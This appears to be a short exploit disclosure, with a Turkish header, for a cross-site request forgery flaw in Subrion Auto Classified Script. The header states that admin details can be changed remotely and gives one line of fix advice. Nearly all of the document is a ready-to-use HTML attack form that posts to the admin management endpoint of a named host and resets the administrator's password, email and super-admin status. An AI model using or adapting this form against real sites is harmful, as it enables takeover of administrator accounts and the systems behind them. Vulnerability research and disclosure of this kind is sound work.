< ------------------- header data start ------------------- >

#############################################################

# Application Name :Subrion Auto Classified Script

# vulnerable Type : xsrf

# Infection : Uzaktan otomatik olarak admin bilgileri degistirebilinir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action=http://autos.subrion.com/admin/admins_manage.php?id=1&action=edit method=post>
<input type=hidden name=prevent_csrf value=174eac6f2b /><table cellspacing=0 cellpadding=0 width=100% class=striped>

<td class=caption colspan=2><strong>General Information</strong></td>

<td width=200><strong>username:</strong></td>
<td><input type=text name=username size=22 value=admin/></td>


<td><strong>Full Name:</strong></td>
<td><input type=text name=fullname size=22 value=Administrator/></td>

<td><strong>Email:</strong></td>
<td><input type=text name=email size=22 value=[email protected] /></td>

<td><strong>password:</strong></td>

<td><input type=password name=new_pass size=22 /></td>

<td><strong>password Confirmation:</strong></td>
<td><input type=password name=new_pass2 size=22 /></td>

<td><strong>Status:</strong></td>
<td><select name=status>
<option value=approval >Approval</option>

<option value=active selected=selected>Active</option>
</select></td>

<td class=caption colspan=2><strong>Admin Permissions</strong></td>

<td><strong>Super Admin:</strong></td>
<td><input type=radio name=super value=1 id=type1 checked=checked onclick=javascript:$(’#permissions’).fadeOut(); /><label for=type1>Enabled</label>

<input type=radio name=super value=0 id=type0 onclick=javascript:$(’#permissions’).fadeIn();/><label for=type0>Disabled</label>
</td>

</table>
<div id=permissions style=display: none;>
<fieldset class=collapsible style=float:left;margin-left:20px;><legend>Common</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Common’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li><input type=checkbox class=group_Common name=permissions[] value=admin_home id=tsadmin_home /><label for=tsadmin_home>Admin Panel</label></li><li><input type=checkbox class=group_Common name=permissions[] value=configuration id=tsconfiguration /><label for=tsconfiguration>Configuration</label></li><li><input type=checkbox class=group_Common name=permissions[] value=admins_manage id=tsadmins_manage /><label for=tsadmins_manage>Manage Admins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=pages_manage id=tspages_manage /><label for=tspages_manage>Manage Pages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=plugins_manage id=tsplugins_manage /><label for=tsplugins_manage>Manage Plugins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=packages_manage id=tspackages_manage /><label for=tspackages_manage>Manage Packages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=database_manage id=tsdatabase_manage /><label for=tsdatabase_manage>Manage Database</label></li><li><input type=checkbox class=group_Common name=permissions[] value=menus_manage id=tsmenus_manage /><label for=tsmenus_manage>Manage Menus</label></li><li><input type=checkbox class=group_Common name=permissions[] value=language_manage id=tslanguage_manage /><label for=tslanguage_manage>Language Manager</label></li><li><input type=checkbox class=group_Common name=permissions[] value=blocks_manage id=tsblocks_manage /><label for=tsblocks_manage>Manage Blocks</label></li><li><input type=checkbox class=group_Common name=permissions[] value=visual_manage id=tsvisual_manage /><label for=tsvisual_manage>Visual Manage</label></li><li><input type=checkbox class=group_Common name=permissions[] value=transactions_manage id=tstransactions_manage /><label for=tstransactions_manage>Manage Transactions</label></li><li><input type=checkbox class=group_Common name=permissions[] value=plans_manage id=tsplans_manage /><label for=tsplans_manage>Manage Plans</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Accounts</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Accounts’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />

<ul style=list-style-type:none><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_manage id=tsaccounts_fields_manage /><label for=tsaccounts_fields_manage>Accounts Fields</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_groups_manage id=tsaccounts_fields_groups_manage /><label for=tsaccounts_fields_groups_manage>Accounts FieldGroups</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_manage id=tsaccounts_manage /><label for=tsaccounts_manage>Manage Accounts</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_search id=tsaccounts_search /><label for=tsaccounts_search>Search account</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_add id=tsaccounts_add /><label for=tsaccounts_add>Add account</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Autos</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Autos’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_groups_manage id=tsautos_fields_groups_manage /><label for=tsautos_fields_groups_manage>Autos Field Groups</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_browse id=tsmakes_browse /><label for=tsmakes_browse>Browse Makes</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_submit id=tsmakes_submit /><label for=tsmakes_submit>Submit Make</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_manage id=tsautos_fields_manage /><label for=tsautos_fields_manage>Autos Fields</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_manage id=tsautos_manage /><label for=tsautos_manage>Manage Autos</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_submit id=tsautos_submit /><label for=tsautos_submit>Submit Auto</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_search id=tsautos_search /><label for=tsautos_search>Search Auto</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Other</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Other’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />

<ul style=list-style-type:none><li><input type=checkbox class=group_Other name=permissions[] value=contact_us id=tscontact_us /><label for=tscontact_us>Contact Us</label></li></fieldset><div style=clear:both;></div>
</div>
<table cellspacing=0 width=100%>
<tr class=all>
<td colspan=2><input type=submit class=button name=save value=Save Changes />
<input type=hidden name=id value=1 />
<input type=hidden name=action value=edit />
</td>

</table>
</form>
< -- bug code end of -- >